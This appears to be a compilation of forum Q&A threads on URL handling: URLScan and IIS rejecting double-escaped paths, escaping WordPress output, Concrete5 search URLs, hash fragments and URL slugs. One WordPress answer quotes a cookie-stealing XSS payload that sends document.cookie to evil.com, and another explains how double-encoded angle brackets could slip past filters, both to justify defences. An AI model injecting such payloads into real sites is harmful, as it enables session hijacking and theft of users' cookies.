URLSCAN question - urlscan

I have uriscan installed on my Win2003 server and it is blocking an older ColdFusion script. The log entry has the following--
2008-09-19 00:16:57 1416208729 GET /Admin/Uploads/Mountain/Wolf%2520Creek%2520gazeebo.jpg Rejected URL+is+double+escaped URL - -
How do I get uriscan to allow submissions like this without turning off the double-escaped url feature?

To quote another post on the subject,
some aspect of your process for
submitting URIs is doing some bad
I recommend changing the name of the JPG to not have spaces in it as a good practice, then later try to figure out with a non-production page why you're not interpreting the %20 as an encoded space, but as a percent sign and two digits.

How do I get uriscan to allow
submissions like this without turning
off the double-escaped url feature?
How do you get it to allow double-escaped URLs without turning off the double-escaped url feature? I think there's something wrong with what you're trying to do. My question is this: does your HTML source literally show image requests with "%2520" in them? Is that the correct name for your file? If so, you really have only two options: rename the file or turn off the feature disallowing double escapes.


Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript, if you do not escape, user set JavaScript could be output to the page and executed (rather than simply displayed as it does on StackOverflow).
e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to www.evil.com, passing all cookies (which could include the session ID of the user, compromising the user's session via session hijacking). However, this is often done in a more subtle fashion so the user is not being aware that they are being attacked, like setting a URL of an <img> tag to pass along the cookies, or even embed a keylogger within the page.
Escaping needs to be done per output context, so it must be done when output rather than when input. Examples of output context are HTML, JavaScript, and CSS and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. & in HTML is & whilst in JavaScript it should be encoded as \x26. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps insure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

Concrete 5 search results page url

Concrete 5 search results page url contains some parameters. how to remove that parameters and make the url user friendly
On an apache server I recommend you to use the mod_rewrite module to use the RewriteEngine.
With this module you can specify aliases for some internal URLs (of course with parameters as well). You can also use RegEx for this.
RewriteEngine on Wikipedia
mod_rewrite tutorial
Short answer: it's probably not worth the trouble.
Long answer...
I'm guessing you see three query parameters when using the search block:
The first parameter is required to make the searches work, but the other two can be dropped. When I build concrete5 themes, I usually "hard-code" the html for the search form, so that I can control which parameters are sent (basically, don't provide a "name" to the submit button, and don't include a "search_paths" hidden field).
The "query" parameter, though, is not going to be easy to get rid of. The problem is that for a search, you're supposed to have a parameter like that in the URL. You could work around this by using javascript -- when the search form is submitted, use some jquery to rewrite the request so it puts that parameter at the end of the URL (for example, http://example.com/search?query=test becomes http://example.com/search/test). Then, as #tuxtimo suggests, you add a rewrite rule to your .htaccess file to take that last piece of the URL and treat it as the ?query parameter that the system expects. But this won't work if the user doesn't have javascript enabled (and hence probably not for Googlebot either, which means that this won't really serve you any SEO purpose -- which I further imagine is the real reason you're asking this question to begin with).
Also, you will run into a lot of trouble if you ever add another page under the page that you show the search results on (because you have the rewrite rule that treats everything after the top-level search page path as a search parameter -- so you can never actually reach an address that exists below that path).
So I'd just make a nice clean search form that only sends the ?query parameter and leave it at that -- I don't think those are really that much less user-friendly than /search-term would be.

Can anyone provide a good info on the various uses of hash(#) in urls?

I'm developing a software, which is going to provide in-deep information about url's.
While the get-params are simple, I'm having trouble with the hash.
At first it was used to mark places in the document to navigate to, but we're past that now. I've seen JS engines using it to store params similar to the get strings.
So, here's my question: is everything that comes after a hash free game, or are there any conventions about what it should look like?
Try these sites it could help. Fragment Identifier, Wikipedia or Pound Sign, Google
It's got a list of examples you could use.
It all depends on what you need. Hashes are used in modern web applications that make use of asynchronous calls to the server using ajax. This e.g. allows the user to copy the link and receive the same content after pasting (actions taken are put into hash which changes the url which otherwise would remain static).
You want to read http://www.jenitennison.com/blog/node/154

Allow Double URL Encoded Request Paths To Be Valid

I have a standard ASP.Net WebForms application running on IIS 7.0 with an Integrated Managed Pipeline. Many of the images on our site have spaces in their files names (e.g. './baseball drawing.gif'). When we place these images into our html pages we url encode the paths so that our html img tags look like this <img src='./baseball%20drawing.gif' />
Now, the problem comes in when certain search engines and webcrawlers try to index our site. When they scrape our pages they will html encode our already html-encoded paths getting image links like this './baseball%2520drawing.gif' where %25 is the url encoding for '%'. This causes two problems:
When users get results from these search engines they receive broken links.
When users attempt to navigate to these broken links it throws errors in our system.
As you can see this is a lose lose situation. Users get broken links, and we get noise in our error logs.
I've been trying to figure out how to correct this problem with no luck. Here is what I've tried:
Set <requestFiltering allowDoubleEscaping='true'> in web.config to prevent the "404.11 URL Double Escaped error". This fixed the first error but caused a new one, "a potentially dangerous Request.Path was found".
Removed the '%' from the <httpRuntime requestPathInvalidChars> to prevent the "potentially dangerous Request.Path" error. This fixed the second error but now we have a third one, "Resource can't be found".
I placed a break in my code to watch Request.Path. It looks like it is right with a value of 'Ball Image.gif' instead of 'Ball%2520Image.gif'. With this being the case I'm not sure why it isn't working.
I feel like I have a super hack where I am having to disable everything without really understanding why nothing is working. So I guess my question is three fold
Why did solution attempt 1 not take care of the problem?
Why did solution 2 not take care of the problem?
Why does my Request.Path look right in step 3 but it still doesn't work?
Any help anyone can provide would be greatly appreciated.
OK, after much searching of the internets and plenty of experimentation I think I finally understand what is going on. My main problem was a case of extreme confirmation bias. Everything I read said what I wanted to hear rather than what it actually said. I am going to summarize greatly the key points I needed to understand in order to answer my question.
First, I needed to understand that IIS and ASP.Net are two different applications. What IIS does in a nutshell is receive a request, route that request to an application that handles it, gets the output from the handling application, and then sends the output from the application back to the requester. What ASP.Net does is receive the request from IIS, handle it, and then pass the response back to IIS. This is a huge over-generalization of the whole process but for my purposes here it is good enough.1
Incoming ASP.Net requests have to pass through two gatekeepers. The IIS7 RequestFiltering module(configured in system.webserver/requestFiltering2), and then the ASP.Net HttpRuntime request filters(configured in system.web/httpRuntime3).
The IIS RequestFiltering module is the only one that normalizes incoming requests and it only applies normalization ONE time. Again I repeat it only applies it ONE time. Even if <requestFiltering allowDoubleEscaping="true" /> it will still only apply normalization once. So that means '%2520' will be normalized to '%20'. At this point if allowDoubleEscaping is false IIS will not let the request through since '%20' could still be normalized. If, however, allowDoubleEscaping is set to true then IIS7 will pass off the request '%20' to the next gatekeeper, ASP.Net. This was the cause of the first error.
The Asp.net filter is where the requestPathInvalidCharacters are checked. So now our '%20' is invalid because by default '%' is a part of requestPathInvalidCharacters. If we remove the '%' from that list we will make it through the second gatekeeper and ASP.Net will try to handle our request. This was the cause of the second error.
Now ASP.net will try to convert our virtual path into a physical one on the server. Unfortunately, we still have a '%20' in our path instead of the ' ' we want so ASP.Net isn't able to find the resource we want and throws a "resource can't be found error". The reason the path looked right to me when I broke in my code is because I placed a watch on the Request.Url property. This property tries to be helpful by applying its own normalization in its ToString() method thus making our %20 look like the ' ' we want even though it isn't. This was the cause of the final error.
To make this work we could write our own custom module that receives the request after the first two gatekeepers and fully normalizes it before handing it off to ASP.Net. Doing this though would allow any character to come through as long as it was URL encoded. For example, we normally don't want to allow a '<' or a '>' in our paths since these can be used to insert tags into our code. As things work right now the < and > will not get past the ASP.Net filter since they are part of the requestPathInvalidCharacters. However, encoded as a %253C and a %253E they can if we open the first two gates and then normalize the request in our own custom module before handing it off to ASP.Net.
In conclusion, allowing %2520 to be fully normalized can't be done without creating a large security hole. If it were possible to tell the RequestFiltering module to fully normalize every request it receives before testing that request against the first two gatekeepers then it would be much safer but right now that functionality isn't available.
If I got anything wrong let me know and I hope this helps somebody.
If you want to allow double-escaping, you can follow the instructions at
It worked for me on IIS 7.0 with no other configuration required. Double-escaping has no impact for the code of the web site I implemented it on; I don't know what potential security implications there could be for other sites.

How should I sanitize urls so people don't put 漢字 or á or other things in them?

How should I sanitize urls so people don't put 漢字 or other things in them?
EDIT: I'm using java. The url will be generated from a question the user asks on a form. It seems StackOverflow just removed the offending characters, but it also turns an á into an a.
Is there a standard convention for doing this? Or does each developer just write their own version?
The process you're describing is slugify. There's no fixed mechanism for doing it; every framework handles it in their own way.
Yes, I would sanitize/remove. It will either be inconsistent or look ugly encoded
Using Java see URLEncoder API docs
Be careful! If you are removing elements such as odd chars, then two distinct inputs could yield the same stripped URL when they don't mean to.
The specification for URLs (RFC 1738, Dec. '94) poses a problem, in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set
This means it will get encoded. URLs should be readable. Standards tend to be English biased (what's that? Langist? Languagist?).
Not sure what convention is other countries, but if I saw tons of encoding in a URL send to me, I would think it was stupid or suspicious ...
Unless the link is displayed properly, encoded by the browser and decoded at the other end ... but do you want to take that risk?
StackOverflow seems to just remove those chars from the URL all together :)
StackOverflow can afford to remove the
characters because it includes the
question ID in the URL. The slug
containing the question title is for
convenience, and isn't actually used
by the site, AFAIK. For example, you
can remove the slug and the link will
still work fine: the question ID is
what matters and is a simple mechanism
for making links unique, even if two
different question titles generate the
same slug. Actually, you can verify
this by trying to go to
and it will just take you back to this
Thanks Mike Spross
Which language you are talking about?
In PHP I think this is the easiest and would take care of everything:
